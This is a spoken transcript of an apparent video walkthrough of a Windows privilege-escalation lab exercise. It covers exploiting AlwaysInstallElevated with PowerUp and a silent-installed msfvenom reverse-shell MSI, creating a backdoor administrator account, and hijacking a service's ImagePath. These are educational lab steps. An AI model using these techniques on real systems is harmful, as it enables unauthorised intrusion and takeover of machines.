DIY security. This is going to be a continuation of Windows Privilege Escalation Arena. So this is part 2. Now we'll connect. Yes, we will accept their certificate. Alright, we are in. So we did task 3 last, so we'll start on task 4. So it says open a command prompt, type reg query HKLM software policies Microsoft Windows installer. Okay. So we'll go down here, enter CMD, open one of these. We will paste that in, and basically what this is doing, it's querying the registry, and we can see we got a 0-1. So if you ever enter this command in a window environment and you see like 0-1, that means true or on, and 0-0 would mean off or non-exploitable. So we'll do this other one. HKCU software policies Microsoft Windows installer. You see, always install elevated. So that's the whole key of this little section here is, I say, the specific package that's installed, it always installs elevated. So we're going to take advantage of this. And once again, this is also on. Alright, so in the tools folder in the Windows machine, they have Power Up already installed on here. So we can cd into C users user desktop tools, and then we'll do a dir. Oh, there's a lot more than I thought. Can we cd into Power Up? Maybe I don't really need the slash. Okay, so now we'll do a dir. And we can see here we have powerup.ps1 already in there. So we can take advantage of this. Say if this was like a penetration test, and you know, we just got into this machine. We're a basic user. You know, we opened up, let's say we just opened up a Python server and we dropped this Power Up in here. We could, now that we have Power Up in here, we could run a command like take advantage of PowerShell. We could say PowerShell -EP bypass. So what this is doing, the -EP stands for execution policy, and of course bypass means bypass, so it's a execution policy bypass. Alright, now we can just dot / Power Up, and you can tab and it should autofill. So now that that's running, we can run a command invoke all checks. So this is basically just showing us all of the things that we could potentially exploit or gain elevated privileges from. So we could see checking for unquoted service paths, AWS Light Agent, files, Amazon. We got AWS Light Agent, permission, checking service executable and argument permissions. Modifiable file, program files, files, permission, service file, permissives, exe. Checking service permissions, DAC, LSV, program files. So that's cool. The abuse function here, invoke service abuse name, is DAC LSVC on this one. But there we go. Checking path for potentially hijackable DLL. Modifiable path. Right user add MSI. So this is the abusable function I'm going to showcase here. And this was the auto runs config that we did on the last video. The modifiable file, program file, auto run, program.exe. And it was open for anyone. Okay, so let's just, well, we're in PowerShell, so we should be able to just type in right user add MSI. So we'll say right user add MSI. Okay, we'll open up another command prompt. Then we will type, okay, we could see user add.msi is there now. So we could do net local group administrators. So we could see TCM is an administrator. Okay, so let's just open up. We'll go to, okay, my computer, local disk C, go to users, user, desktop, tools. There we go. I'm just then power up. Okay, so we can see the user add here now, and that was what we just made down here, the user add.msi. So now we can double click this. All right, so now we got access to add a user. We'll make the username backdoor, password 123, and it's going to be in the administrator group. Okay, sure. Create. Now if we go back to our other command prompt, let's see if our backdoor is in the administrator group. We can see indeed it is. Backdoor is now under the administrator group. Cool. So now, for the exploitation, we could use MSF console. So we use multi-handler, looks like pretty much the same as last time, and then we'll get the shell. Right. Oh, my dang mouse keeps messing up on me. Come on. So MSF console. Can use multi-handle. And then set payload to Windows. Uh-oh, did it freeze up on me? Oh, there we go. It's just acting slow. Reverse, as a lowercase, TCP. Okay, so we'll set the L host to our Kali address. .9.0.128. Okay. Show options. It's on port 444. So we will do this command, which MSF Venom will be creating our payload. Ten dot 9.0.128. So it's going to be creating this file and outputting it into setup.msi. I might have messed up. I don't think there's supposed to be a space here. Okay, there we go. So we will move setup into transfer, cd into transfer. Now we will start a Python server. So do Python 3-m http .server on port 80. Now back on the victim machine, we'll go in that Internet Explorer. We'll go http:// 10.9 10.9. Ask me later. 10.9.0.128 on port 80. Okay, so we'll go ahead and grab that setup.msi. We're going to place the setup MSI in the temp directory. And then we're going to enter this command, msi execute quiet qn/i c temp setup msi. So we will save. And go to my computer. Temp. Close that. Then we will run this command. Now we should have a shell if everything worked right. Hey, look at that, we got a shell. So we can see here, I am NT Authority System. And we can see we are in there. All right. So now on to the next. So for service escalation and executable files, it's pretty cool. I mean, I think all this stuff's pretty cool, but John Hammond just recently did a video and it was pretty awesome, which back in the day before I'd switched to Linux, I was using Windows and I was trying to figure out why can't I just delete like almost everything on Windows, you know? Why can't I delete the bloat? It was giving me messages like access denied even though I'm the administrator. And it just didn't make sense to me, but after watching his video, I really understood. And basically he was able to become the it's like NT trusted installer or something like that. So he became the trusted installer, and yeah, I thought that was really awesome. That trusted installer is not even a user, but he was able to become the trusted installer, and yeah, you could do a bunch of crazy stuff with that, break stuff and delete stuff. Anyway, I digress. So we can exit out all this actually. Starting fresh. Alright, so if we type in CMD once again and say, who am I? I am just a user. And then we'll do the net local group administrator. So we can see user is not part of the administrator. So with this exercise, we are going to be making ourselves become part of the administrator group. Okay. We'll agree to that. All right, So access check, we're using our access check. We got file permservice.exe, medium, and I remember reading this earlier whenever we did our power up. So we got read write to everybody. File all access, that's what we want. So notice that everyone gets the file all access permission on the file permservice.exe file. So exploitation, open the command prompt, type copy /y temp exe x.exe c programs file service permission. So we'll copy this. And actually, I think I'm in the wrong spot. Over here we need to navigate to the source, tools and source. So we'll cd into C users, user desktop, top, tools, source. That didn't work. Just paste this in. System cannot find the file specified. That's because we didn't create it yet. So if we do a dir, we can see Windows underscore service.c. That's what we want. So I want to be able to modify this Windows service.c. So let's see, we're going to bring it over to Kali. So let's see if I can, we will start a FTP server. So Python -m py FTP DLIB, I think that's right, dash 21 for port 21, and it's gonna be writable. Ooh, I don't have FTP. I'll do pip 3 install py FTP PD. Alright, so I realized I had a syntax error. Instead of a -21, I meant to put a -p for port 21. Alright, so we got the Python server started. Now we will go back and we'll open the FTP connection. So we can do FTP 10.9.0.128. Say anonymous, ANONY, password. So we can say dir. And there's our setup. So from here, we want to put the Windows service .c or .c. Alright, so we just exfiltrated some data onto our Python server. You can see it came in here. So we should be able to just exit out of this. We'll ls, and there it is. So we can mousepad Windows Service C. Alright, so this is written in C, which I really would like to learn C, but I'm just face the hard facts that I still am pretty much a script kiddie. I gotta look up everything constantly. But I do understand what this means. System, who am I? It's giving out a command in this directory, Windows temp service.txt. So instead of this command, we are going to change it up. We're going to change it up. So yeah, it's saying open a Windows Service C in the text editor, replace the command used by the system function to cmd/k net local group administrator user/add. So we will be adding our user. Let's see. So right here, system. We should be able to just paste ours right in. There we go. We'll save this. Save and exit. Exit the text editor. Compile the file by typing the following command. Okay. So let's make sure it's in here. Yeah. So basically, it's just taking this command. We're going to be taking this command and compiling it, and we're going to be turning it into an executable. Okay. There we go, it worked. I'm trying to figure out, what did I mess up? I mean, it looks exactly the same to me. I don't get why it was saying it wasn't found before. But anyway, now we do have our x.exe. So now we're going to start our Python server up again. So we'll just clear this. We'll do, once again, python 3-m http.server on port 80. Okay. Head back to the Windows machine. We can go ahead and disconnect out of this. Bye. There we go. Okay, so after we transfer, we're gonna, well, we haven't transferred, so let's get that transferred. HTTP, not S. 10.9.0.128 on port 80, and there it is. So now we're going to save this in the temp directory. Wait, make sure. Yeah, place in the temp directory. So my computer, go to local disk C, temp, and we'll save that right there. We'll exit out of that. So we'll do our net local group administrators. So we're not in. So after we transfer it, we need to run this command, which is this. And I'll explain the best I can what that does. So we could see just a minute ago when I checked who the administrators was, what we were not in the group. So now, gosh dang it, I lost the place. Okay. I'm just gonna put it on this screen because it's a little bit bigger. So the V, basically what this command's doing, so we're adding to the registry. So the V is the value of the image path, right? And then when the service starts, the image path, it'll run the executable for us. Okay, so the SC is going to be starting our registry service, and the /T is the type, which is registry expand. And basically what that's saying is we're going to run this string. The D is the data, and the data, of course, is our modified x.executable. The /F is for force. So pretty much it's bypassing any prompt. It's pretty much just like, hey, just run this. Don't tell me anything. Don't pop up. Don't make any pop-ups. Just run this. Okay. So let's see what happens when we run this. We'll hit enter. The operation is completed successfully. Once again, we'll do our net local group administrators. Oh, I forgot. We do gotta start the service. Start reg svc for service. Okay. So it says service name, Win32, own process, start pending, not stoppable, not pausable, ignore shutdown. So let's run this command again, and we can see now we have elevated ourselves into the administrator group. Alright guys, that's going to be it for this one. Make sure you hit that like button, subscribe if you haven't already, and I really appreciate you guys sticking around, hanging out, possibly learning something. Yep, part 3 will be coming next week.